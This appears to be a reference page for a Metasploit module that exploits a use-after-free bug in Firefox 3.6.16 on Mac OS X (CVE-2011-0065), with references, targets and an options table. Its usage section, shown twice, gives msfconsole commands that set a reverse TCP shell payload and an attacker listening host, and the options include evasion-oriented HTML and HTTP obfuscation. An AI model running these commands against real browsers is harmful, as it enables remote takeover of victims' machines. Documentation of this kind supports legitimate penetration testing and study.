Mozilla Firefox 3.6.16 mChannel Use-After-Free
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
Exploit Rank
- Normal
Exploit Authors
- regenrecht < >
- Rh0 < >
- argp < argp [at] census-labs.com >
Vulnerability References
- CVE-2011-0065
- OSVDB-72085
- https://bugzilla.mozilla.org/show_bug.cgi?id=634986
- http://www.mozilla.org/security/announce/2011/mfsa2011-13.html
Exploit Targets
- 0 - Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3) (default)
Exploit Development
Similar Exploit Modules
- exploit/osx/browser/safari_file_policy
- exploit/osx/browser/safari_libtiff
- exploit/osx/browser/safari_metadata_archive
- exploit/osx/browser/software_update
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/osx/browser/mozilla_mchannel
msf exploit(mozilla_mchannel) > show payloads
msf exploit(mozilla_mchannel) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(mozilla_mchannel) > set LHOST [MY IP ADDRESS]
msf exploit(mozilla_mchannel) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/osx/browser/mozilla_mchannel
msf exploit(mozilla_mchannel) > show payloads
msf exploit(mozilla_mchannel) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(mozilla_mchannel) > set LHOST [MY IP ADDRESS]
msf exploit(mozilla_mchannel) > exploit
Exploit Module Options
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 8080) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| HTTP::server_name | Configures the Server header of all outgoing replies |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |